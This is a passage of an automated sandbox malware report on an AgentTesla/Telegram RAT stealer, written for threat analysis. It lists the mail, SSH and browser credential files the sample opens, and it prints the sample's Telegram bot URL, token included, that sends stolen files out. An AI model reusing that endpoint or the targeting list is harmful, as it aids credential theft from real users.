            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00E9F120 GetUserNameW,1_2_00E9F120

            Stealing of Sensitive Information

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6088, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation            		Path Interception311
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		111
            Security Software Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Web Service            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		1
            Credentials in Registry            		1
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		Exfiltration Over Bluetooth11
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration1
            Ingress Tool Transfer            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)311
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer3
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information            		LSA Secrets1
            Account Discovery            		SSHKeyloggingData Transfer Size Limits14
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
            System Owner/User Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            Remote System Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            System Network Configuration Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow114
            System Information Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            g0PWOnCNZH.exe43%VirustotalBrowse
            g0PWOnCNZH.exe26%ReversingLabsWin32.Trojan.Generic
            g0PWOnCNZH.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.RegSvcs.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.sajatypeworks.comiv0%URL Reputationsafe
            http://www.sajatypeworks.com20%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.fontbureau.coml10%URL Reputationsafe
            http://www.founder.com.cn/cnD0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            https://api.telegram.org40%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fontbureau.comgrito0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sajatypeworks.comTF0%URL Reputationsafe
            http://www.carterandcone.comTC0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.monotype.0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.tiro.com(0%Avira URL Cloudsafe
            http://www.fontbureau.como0%URL Reputationsafe
            http://www.fontbureau.como0%URL Reputationsafe
            http://www.monotype.U0%Avira URL Cloudsafe
            http://www.tiro.comw0%Avira URL Cloudsafe
            http://www.sajatypeworks.comq0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htmR0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htmR0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            api4.ipify.org
            		64.185.227.155
            		truefalse
              		high
              api.telegram.org
              		149.154.167.220
              		truefalse
                		high
                api.ipify.org
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    		high
                    https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.fontbureau.com/designersGg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.monotype.Ug0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sajatypeworks.comivg0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.com2g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/?g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.orgRegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers?g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersBg0PWOnCNZH.exe, 00000000.00000003.263731883.0000000005D55000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.tiro.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.goodfont.co.krg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comg0PWOnCNZH.exe, 00000000.00000003.270701555.0000000005D50000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.coml1g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cnDg0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cTheg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.ipify.orgRegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://fontfabrik.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.telegram.org4RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.comgritog0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fonts.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.tiro.com(g0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D58000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.zhongyicts.com.cng0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmRg0PWOnCNZH.exe, 00000000.00000003.261346015.0000000005D55000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.sakkal.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.comg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.comwg0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sajatypeworks.comqg0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sajatypeworks.comTFg0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.comTCg0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.carterandcone.comlg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cng0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/frere-jones.htmlg0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.monotype.g0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.comog0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers8g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://api.telegram.orgRegSvcs.exe, 00000001.00000002.524290015.0000000002921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.154.167.220
                                                      		api.telegram.orgUnited Kingdom
                                                      		62041TELEGRAMRUfalse
                                                      64.185.227.155
                                                      		api4.ipify.orgUnited States
                                                      		18450WEBNXUSfalse

                                                      General Information

                                                      Joe Sandbox Version:37.0.0 Beryl
                                                      Analysis ID:830729
                                                      Start date and time:2023-03-20 16:40:05 +01:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 8m 30s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample file name:g0PWOnCNZH.exe
                                                      Original Sample Name:87be1ac6122ed0c75b3af80696b9e686.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 95%
                                                      • Number of executed functions: 43
                                                      • Number of non-executed functions: 13
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      16:41:07API Interceptor1x Sleep call for process: g0PWOnCNZH.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      149.154.167.220file.exeGet hashmaliciousUnknownBrowse
                                                        Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                          New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                            PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                              PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                  FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                    doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                      EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                        NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                          2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                            iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                                YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      DHL_Original_Document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          Dn4GujmGOF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            Inv-67383728 [Reference Nr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              64.185.227.155CnsRlvK7Ho.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                              • api.ipify.org/
                                                                                              aKiefGOIEn.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                              • api.ipify.org/
                                                                                              M74aRxVX4H.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                              • api.ipify.org/
                                                                                              WolcGwXQ5c.exeGet hashmaliciousFicker Stealer, RHADAMANTHYS, Rusty StealerBrowse
                                                                                              • api.ipify.org/?format=wef
                                                                                              XZerken3Py.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                              • api.ipify.org/
                                                                                              xc17rfFdOM.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                              • api.ipify.org/?format=wef
                                                                                              8Ghi4RAfH5.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                              • api.ipify.org/?format=wef
                                                                                              fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                              • api.ipify.org/?format=wef
                                                                                              file.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                              • api.ipify.org/?format=wef
                                                                                              48PTRR4pVY.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                                                                              • api.ipify.org/?format=qwd

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              api4.ipify.orgFeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 64.185.227.155
                                                                                              DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 173.231.16.76
                                                                                              New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.237.62.211
                                                                                              TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                              • 173.231.16.76
                                                                                              PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 64.185.227.155
                                                                                              PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 64.185.227.155
                                                                                              2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 173.231.16.76
                                                                                              Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.237.62.211
                                                                                              REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                              • 104.237.62.211
                                                                                              eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 173.231.16.76
                                                                                              INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 173.231.16.76
                                                                                              IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.237.62.211
                                                                                              yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 173.231.16.76
                                                                                              yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 173.231.16.76
                                                                                              DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 64.185.227.155
                                                                                              FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                              • 104.237.62.211
                                                                                              main.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                              • 173.231.16.76
                                                                                              Purchase_Order-0823636.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 64.185.227.155
                                                                                              EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.237.62.211
                                                                                              V9hBN9tW4H.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 64.185.227.155
                                                                                              api.telegram.orgfile.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
